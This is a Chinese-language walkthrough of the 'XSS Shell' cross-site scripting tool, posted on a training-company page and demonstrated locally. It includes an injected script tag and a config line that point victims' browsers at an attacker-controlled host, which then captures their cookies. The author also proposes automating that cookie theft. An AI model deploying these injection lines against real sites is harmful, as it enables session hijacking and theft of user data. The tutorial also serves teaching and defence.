返學(xué)費(fèi)網(wǎng) > 培訓(xùn)機(jī)構(gòu) > 武漢北斗互聯(lián)教育咨詢有限公司
跨站腳本攻擊(也稱為XSS)指利用網(wǎng)站漏洞從用戶那里惡意盜取信息。攻擊者通過在鏈接中插入惡意代碼,就能夠盜取用戶信息。攻擊者通常會(huì)在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash以欺騙用戶。
并非任何可利用腳本插入實(shí)現(xiàn)攻擊的漏洞都被稱為XSS,比如說,你alert一個(gè)窗口并不表示就存在XSS漏洞。真正的XSS應(yīng)該稱作Script injection,只有能把我們插入的腳本保存在被修改的遠(yuǎn)程WEB頁(yè)面里,才能有利用價(jià)值。攻擊者通常會(huì)在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash以欺騙用戶
---------------------
演示題目:XSS 攻擊
利用工具:Xss shell
輔助工具:Aws
---------------------
by no7oor
Xss shell 是一款A(yù)SP的xss攻擊工具,需要在支持ASP的服務(wù)上運(yùn)行。被攻擊的頁(yè)面會(huì)顯示在xss shell里,并可以對(duì)其進(jìn)行遠(yuǎn)程操作
注意:所有演示都是在本地完成的。
1、搭建Xss Shell 運(yùn)行環(huán)境
a、配置AWS 服務(wù)器。AWS服務(wù)是一個(gè)簡(jiǎn)單的ASP服務(wù)器,配置很簡(jiǎn)單,把ASP文件放在AWS同一目錄下即可
2、配置XSS SHELL
配置前先說一下,xss shell的結(jié)構(gòu)
db\shell.mdb 是用來(lái)存放通過xss漏洞采集到的信息的數(shù)據(jù)庫(kù) 。
sample_victim\default.asp 是一個(gè)存在xss漏洞的頁(yè)面,并嵌入了準(zhǔn)備好的腳本 為了輸入方便,我改成xssbug
這個(gè)default.asp 其實(shí)就是存在xss漏洞的頁(yè)面,這里只是構(gòu)造了一個(gè)演示。
xssshell\下面的文件是控制端 這一部份放在asp服務(wù)器上。
xssshell.asp 是主要的功能程序
a、修改xssshell.asp文件 var SERVER = "http://attacker/"; 把a(bǔ)ttacker 改成xssshell存放的ip
b、修改db.asp文件
c、修改演示頁(yè)面default.asp文件 也就是嵌入腳本
<script src="http://192.168.1.19/xssshell.asp?v=336699"></script> 關(guān)鍵代碼。這個(gè)就是xss的腳本利用代碼了
3、觀看效果
這個(gè)頁(yè)面就是控制端了,在這里可以看到打開了有xss漏洞頁(yè)面的機(jī)器上線,我們來(lái)測(cè)試一下看看。
OK 上線了…… 這時(shí)我們就可以對(duì)它進(jìn)行操作了。因?yàn)檫@個(gè)xssshell并不是功能完整的,我也就測(cè)試一下抓取cookies。
給對(duì)方發(fā)送了一個(gè)message頁(yè)面。
也抓取到了cookies。
一但對(duì)方關(guān)閉有xss漏洞的頁(yè)面,那么對(duì)方也就下線了。。。。
4、注意事項(xiàng)
a、Web服務(wù)器port最好為80端口
b、Xss Shell數(shù)據(jù)庫(kù)DBPATH = "..\db\shell.mdb" 的路徑最好是相對(duì)路徑
5、總結(jié)
Xss shell 這款工具只能對(duì)打開漏洞頁(yè)面并不關(guān)閉的情況下,才可以對(duì)其進(jìn)行操作,一但關(guān)閉頁(yè)面,隨之也就下線,不能對(duì)其操作了。應(yīng)該還可以增強(qiáng)此功能,比如增加自動(dòng)采集cookies 一但對(duì)方上線,實(shí)現(xiàn)立刻抓取cookies并保存到指定位置,這樣這款工具就更具備智能化,更加有實(shí)用價(jià)值。另外,我這次演示的版本,還有一些功能并沒有實(shí)現(xiàn)。應(yīng)該可以完善。
*網(wǎng)絡(luò)安全小組成立 網(wǎng)絡(luò)強(qiáng)國(guó)開啟
我國(guó)計(jì)算機(jī)取證技術(shù)發(fā)展現(xiàn)狀方向
只要一個(gè)電話
我們免費(fèi)為您回電